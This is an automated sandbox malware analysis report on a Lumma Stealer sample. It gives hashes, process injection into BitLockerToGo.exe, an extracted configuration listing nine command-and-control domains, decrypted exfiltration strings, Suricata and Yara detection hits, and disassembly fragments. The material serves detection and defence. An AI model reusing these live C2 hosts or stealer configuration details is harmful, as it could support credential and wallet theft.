Edit tour

Windows Analysis Report
webNY0O9Sr.exe

Overview

General Information

Sample name:	webNY0O9Sr.exe renamed because original name is a hash value
Original sample name:	8f37465d74be6e785296584fe6d4e5a8bd9f09c6a9db38c9a377c28ca25da986.exe
Analysis ID:	1524042
MD5:	d3a46bd951e1bb457349dac15c09098e
SHA1:	a0ce8454ce4077858ac8b3ce17f410634f0f0493
SHA256:	8f37465d74be6e785296584fe6d4e5a8bd9f09c6a9db38c9a377c28ca25da986
Tags:	exeGuizhouSixuandaTechnologyCoLtdsigneduser-JAMESWT_MHT
Infos:

Detection

LummaC

Score:	93
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected LummaC Stealer

AI detected suspicious sample

Allocates memory in foreign processes

C2 URLs / IPs found in malware configuration

Injects a PE file into a foreign processes

LummaC encrypted strings found

Sample uses string decryption to hide its real strings

Writes to foreign memory regions

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to read the clipboard data

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Found inlined nop instructions (likely shell or obfuscated code)

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file contains sections with non-standard names

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Yara signature match

Classification

Process Tree

System is w10x64

webNY0O9Sr.exe (PID: 6332 cmdline: "C:\Users\user\Desktop\webNY0O9Sr.exe" MD5: D3A46BD951E1BB457349DAC15C09098E)

BitLockerToGo.exe (PID: 6572 cmdline: "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe" MD5: A64BEAB5D4516BECA4C40B25DC0C1CD8)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Lumma Stealer, LummaC2 Stealer	Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.	No Attribution	https://0xmrmagnezi.github.io/malware%20analysis/LummaStealer/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/lummac2-breakdown#chrome-extensions-crx https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.cyble.com/2023/01/06/lummac2-stealer-a-potent-threat-to-crypto-users/ https://blog.sekoia.io/exposing-fakebat-loader-distribution-methods-and-adversary-infrastructure/	https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware Configuration

Threatname: LummaC

{"C2 url": ["writekdmsnu.site", "famikyjdiag.site", "bellykmrebk.site", "delaylacedmn.site", "agentyanlark.site", "commandejorsk.site", "underlinemdsj.site", "nurserrsjwuwq.shop", "possiwreeste.site"], "Build id": "c2CoW0--buildnafart"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000000.00000002.2258275643.00000000025D4000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
00000000.00000002.2258275643.0000000002400000.00000004.00001000.00020000.00000000.sdmp	Msfpayloads_msf_9	Metasploit Payloads - file msf.war - contents	Florian Roth	0x0:$x1: 4d5a9000030000000
00000000.00000002.2258275643.0000000002577000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
00000000.00000002.2258275643.00000000024DC000.00000004.00001000.00020000.00000000.sdmp	Msfpayloads_msf_9	Metasploit Payloads - file msf.war - contents	Florian Roth	0x0:$x1: 4d5a9000030000000
00000002.00000002.2291496488.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
decrypted.memstr	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security
Click to see the 1 entries

Unpacked PEs

Source	Rule	Description	Author
2.2.BitLockerToGo.exe.400000.0.raw.unpack	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
2.2.BitLockerToGo.exe.400000.0.unpack	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
0.2.webNY0O9Sr.exe.25d4000.1.unpack	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
0.2.webNY0O9Sr.exe.25d4000.1.raw.unpack	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security

Suricata Signatures

ET MALWARE Lumma Stealer CnC Host Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-02T15:06:53.273795+0200	2054653	1	A Network Trojan was detected	192.168.2.5	49716	188.114.96.3	443	TCP
2024-10-02T15:06:55.637733+0200	2054653	1	A Network Trojan was detected	192.168.2.5	49718	172.67.209.193	443	TCP

ET MALWARE Lumma Stealer Related Activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-02T15:06:53.273795+0200	2049836	1	A Network Trojan was detected	192.168.2.5	49716	188.114.96.3	443	TCP
2024-10-02T15:06:55.637733+0200	2049836	1	A Network Trojan was detected	192.168.2.5	49718	172.67.209.193	443	TCP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (agentyanlark .site)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-02T15:06:53.414396+0200	2056324	1	Domain Observed Used for C2 Detected	192.168.2.5	61034	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (bellykmrebk .site)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-02T15:06:53.383964+0200	2056328	1	Domain Observed Used for C2 Detected	192.168.2.5	65172	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (commandejorsk .site)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-02T15:06:53.361667+0200	2056334	1	Domain Observed Used for C2 Detected	192.168.2.5	64435	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (delaylacedmn .site)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-02T15:06:53.437360+0200	2056336	1	Domain Observed Used for C2 Detected	192.168.2.5	56558	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (famikyjdiag .site)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-02T15:06:53.312369+0200	2056338	1	Domain Observed Used for C2 Detected	192.168.2.5	55295	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (possiwreeste .site)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-02T15:06:53.331397+0200	2056340	1	Domain Observed Used for C2 Detected	192.168.2.5	55420	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (underlinemdsj .site)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-02T15:06:53.373584+0200	2056344	1	Domain Observed Used for C2 Detected	192.168.2.5	56083	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (writekdmsnu .site)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-02T15:06:53.426398+0200	2056346	1	Domain Observed Used for C2 Detected	192.168.2.5	64373	1.1.1.1	53	UDP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: https://steamcommunity.com/profiles/76561199724331900	URL Reputation: Label: malware
Source: https://steamcommunity.com/profiles/76561199724331900/inventory/	URL Reputation: Label: malware
Source: https://steamcommunity.com/profiles/76561199724331900/badges	URL Reputation: Label: malware

Found malware configuration

Source: 0.2.webNY0O9Sr.exe.25d4000.1.raw.unpack

Malware Configuration Extractor: LummaC {"C2 url": ["writekdmsnu.site", "famikyjdiag.site", "bellykmrebk.site", "delaylacedmn.site", "agentyanlark.site", "commandejorsk.site", "underlinemdsj.site", "nurserrsjwuwq.shop", "possiwreeste.site"], "Build id": "c2CoW0--buildnafart"}

Multi AV Scanner detection for submitted file

Source: webNY0O9Sr.exe

ReversingLabs: Detection: 31%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Sample uses string decryption to hide its real strings

Source: 00000000.00000002.2258275643.00000000025D4000.00000004.00001000.00020000.00000000.sdmp	String decryptor: delaylacedmn.site
Source: 00000000.00000002.2258275643.00000000025D4000.00000004.00001000.00020000.00000000.sdmp	String decryptor: writekdmsnu.site
Source: 00000000.00000002.2258275643.00000000025D4000.00000004.00001000.00020000.00000000.sdmp	String decryptor: agentyanlark.site
Source: 00000000.00000002.2258275643.00000000025D4000.00000004.00001000.00020000.00000000.sdmp	String decryptor: bellykmrebk.site
Source: 00000000.00000002.2258275643.00000000025D4000.00000004.00001000.00020000.00000000.sdmp	String decryptor: underlinemdsj.site
Source: 00000000.00000002.2258275643.00000000025D4000.00000004.00001000.00020000.00000000.sdmp	String decryptor: commandejorsk.site
Source: 00000000.00000002.2258275643.00000000025D4000.00000004.00001000.00020000.00000000.sdmp	String decryptor: possiwreeste.site
Source: 00000000.00000002.2258275643.00000000025D4000.00000004.00001000.00020000.00000000.sdmp	String decryptor: famikyjdiag.site
Source: 00000000.00000002.2258275643.00000000025D4000.00000004.00001000.00020000.00000000.sdmp	String decryptor: nurserrsjwuwq.shop
Source: 00000000.00000002.2258275643.00000000025D4000.00000004.00001000.00020000.00000000.sdmp	String decryptor: lid=%s&j=%s&ver=4.0
Source: 00000000.00000002.2258275643.00000000025D4000.00000004.00001000.00020000.00000000.sdmp	String decryptor: TeslaBrowser/5.5
Source: 00000000.00000002.2258275643.00000000025D4000.00000004.00001000.00020000.00000000.sdmp	String decryptor: - Screen Resoluton:
Source: 00000000.00000002.2258275643.00000000025D4000.00000004.00001000.00020000.00000000.sdmp	String decryptor: - Physical Installed Memory:
Source: 00000000.00000002.2258275643.00000000025D4000.00000004.00001000.00020000.00000000.sdmp	String decryptor: Workgroup: -
Source: 00000000.00000002.2258275643.00000000025D4000.00000004.00001000.00020000.00000000.sdmp	String decryptor: c2CoW0--buildnafart

Source: webNY0O9Sr.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: webNY0O9Sr.exe

Static PE information: certificate valid

Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49716 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.5:49717 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.209.193:443 -> 192.168.2.5:49718 version: TLS 1.2

Source: webNY0O9Sr.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source:	Binary string: BitLockerToGo.pdb source: webNY0O9Sr.exe, 00000000.00000002.2258275643.000000000279C000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: BitLockerToGo.pdbGCTL source: webNY0O9Sr.exe, 00000000.00000002.2258275643.000000000279C000.00000004.00001000.00020000.00000000.sdmp

Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then movzx edx, byte ptr [ecx+eax]	2_2_0040F930
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov eax, dword ptr [esp]	2_2_0040F930
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then test byte ptr [esp+0Ch], 00000040h	2_2_00401000
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov eax, esi	2_2_00401000
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then cmp byte ptr [ebp+esi+23h], 00000000h	2_2_0040F0C7
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov word ptr [eax], dx	2_2_004210D4
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov ebx, ecx	2_2_004140EB
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov word ptr [eax], dx	2_2_004210BC
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 0633C81Dh	2_2_0042810E
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov eax, dword ptr [esp]	2_2_00425120
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then movzx ebx, byte ptr [edx]	2_2_0043C1F0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov eax, dword ptr [ebp-10h]	2_2_0042D262
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov eax, dword ptr [esi+04h]	2_2_0041526A
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then cmp dword ptr [ebx+edx*8], 1B788DCFh	2_2_004452E0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then cmp word ptr [ebp+edi+02h], 0000h	2_2_004272F0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov eax, dword ptr [esi]	2_2_004132B9
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov byte ptr [edi], al	2_2_004132B9
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov ecx, dword ptr [edi+eax]	2_2_0042E325
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov eax, dword ptr [esp]	2_2_004303A8
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then cmp byte ptr [esi+ebx], 00000000h	2_2_00431460
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov word ptr [ebx], ax	2_2_00421430
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov eax, dword ptr [esp]	2_2_00421430
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 0633C81Dh	2_2_00446430
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov eax, dword ptr [esp]	2_2_00429490
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then push edi	2_2_00416497
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov eax, dword ptr [esi+04h]	2_2_00416497
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then cmp word ptr [esi+ebx], 0000h	2_2_0041D4B0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov word ptr [eax], cx	2_2_00427550
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov eax, dword ptr [esi+04h]	2_2_004145B2
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov eax, dword ptr [esp]	2_2_0044C650
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then cmp word ptr [ebx+esi+02h], 0000h	2_2_00423662
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], CECD21FDh	2_2_0042C670
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then cmp dword ptr [edi+edx*8], CECD21FDh	2_2_0042C670
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then dec ebx	2_2_00440600
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov word ptr [eax], cx	2_2_0040F6B7
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then movzx ecx, byte ptr [edi+ebx]	2_2_00405740
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then cmp dword ptr [edi+edx*8], 54CA534Eh	2_2_00449790
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov word ptr [eax], dx	2_2_00421833
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then jmp eax	2_2_004298D1
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov word ptr [edi], ax	2_2_004298D1
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then movzx edx, word ptr [eax]	2_2_004298D1
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then cmp word ptr [ecx+eax+02h], 0000h	2_2_0041D8F0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov eax, dword ptr [esi+00000188h]	2_2_004328F0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov eax, dword ptr [esi+1Ch]	2_2_004328F0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov byte ptr [ebx], al	2_2_004328F0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov byte ptr [ebx], al	2_2_004328F0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov byte ptr [ebx], al	2_2_004328F0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov byte ptr [edi], al	2_2_004328F0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov byte ptr [ebx], al	2_2_004328F0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov eax, dword ptr [esi+00000084h]	2_2_004328F0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov byte ptr [edi], al	2_2_004328F0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov eax, dword ptr [esi+00000188h]	2_2_004328F0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov byte ptr [edi], al	2_2_004328F0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov eax, dword ptr [esi+00000188h]	2_2_004328F0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov byte ptr [ebx], al	2_2_004328F0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov byte ptr [edi], al	2_2_004328F0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov dword ptr [ebp-14h], ecx	2_2_0044A932
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov dword ptr [ebp-14h], ecx	2_2_0044A9E0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov eax, dword ptr [esp]	2_2_00445A00
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 0633C81Dh	2_2_00445A00
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then push edi	2_2_0042DB73
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov eax, dword ptr [ebp-00000094h]	2_2_0042EB22
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov eax, dword ptr [esp]	2_2_00448B32
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then movzx eax, word ptr [esi+ecx]	2_2_00442BE0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then movzx edi, byte ptr [ecx+esi]	2_2_00406B90
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov dword ptr [ebp-14h], ecx	2_2_0044AB90
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov eax, dword ptr [esp+10h]	2_2_0040DC30
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov eax, dword ptr [esp+0Ch]	2_2_0044BC30
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then cmp dword ptr [ebx+edx*8], 7E28BDA7h	2_2_0044BC30
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then add ecx, dword ptr [esp+eax*4+30h]	2_2_0040BCE0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov dword ptr [ebp-14h], ecx	2_2_0044AC90
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov dword ptr [ebp-14h], ecx	2_2_0044AD70
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov edi, eax	2_2_00449D20
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov word ptr [eax], cx	2_2_00428DC0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov eax, dword ptr [esp+0Ch]	2_2_0044BDC0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then cmp dword ptr [ebx+edx*8], 7E28BDA7h	2_2_0044BDC0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then movzx ebx, byte ptr [ecx+eax]	2_2_00448DCF
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov dword ptr [esp], 00000000h	2_2_0041ADD0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then cmp byte ptr [edi], 00000000h	2_2_00415DE0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov eax, dword ptr [ebp-14h]	2_2_0042EE5A
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov eax, dword ptr [esp+04h]	2_2_00421E00
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then jmp eax	2_2_0042AEDF
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov eax, dword ptr [esi+04h]	2_2_00414E9A
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov eax, dword ptr [esp]	2_2_00444EA0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then push edi	2_2_00415EA6
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then cmp dword ptr [ebp+edx*8+00h], 81105F7Ah	2_2_0044BF40
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov ebx, dword ptr [edi+04h]	2_2_00430F60
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov byte ptr [ebx], al	2_2_00412F7D
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov eax, dword ptr [esi]	2_2_00412F7D
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov eax, dword ptr [esp+00000878h]	2_2_00429FCD
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then movzx edx, word ptr [ecx+eax]	2_2_0041DFA6
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov eax, dword ptr [esp+30h]	2_2_0041DFA6
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov eax, dword ptr [esp+0000008Ch]	2_2_0041DFA6
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 77DD2217h	2_2_0041DFA6

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2056338 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (famikyjdiag .site) : 192.168.2.5:55295 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2056328 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (bellykmrebk .site) : 192.168.2.5:65172 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2056340 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (possiwreeste .site) : 192.168.2.5:55420 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2056346 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (writekdmsnu .site) : 192.168.2.5:64373 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2056324 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (agentyanlark .site) : 192.168.2.5:61034 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2056344 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (underlinemdsj .site) : 192.168.2.5:56083 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2056336 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (delaylacedmn .site) : 192.168.2.5:56558 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2056334 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (commandejorsk .site) : 192.168.2.5:64435 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:49718 -> 172.67.209.193:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49718 -> 172.67.209.193:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:49716 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49716 -> 188.114.96.3:443

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: writekdmsnu.site
Source: Malware configuration extractor	URLs: famikyjdiag.site
Source: Malware configuration extractor	URLs: bellykmrebk.site
Source: Malware configuration extractor	URLs: delaylacedmn.site
Source: Malware configuration extractor	URLs: agentyanlark.site
Source: Malware configuration extractor	URLs: commandejorsk.site
Source: Malware configuration extractor	URLs: underlinemdsj.site
Source: Malware configuration extractor	URLs: nurserrsjwuwq.shop
Source: Malware configuration extractor	URLs: possiwreeste.site

Source: Joe Sandbox View	IP Address: 188.114.96.3 188.114.96.3
Source: Joe Sandbox View	IP Address: 188.114.96.3 188.114.96.3
Source: Joe Sandbox View	IP Address: 104.102.49.254 104.102.49.254
Source: Joe Sandbox View	IP Address: 172.67.209.193 172.67.209.193

Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: Joe Sandbox View

JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1

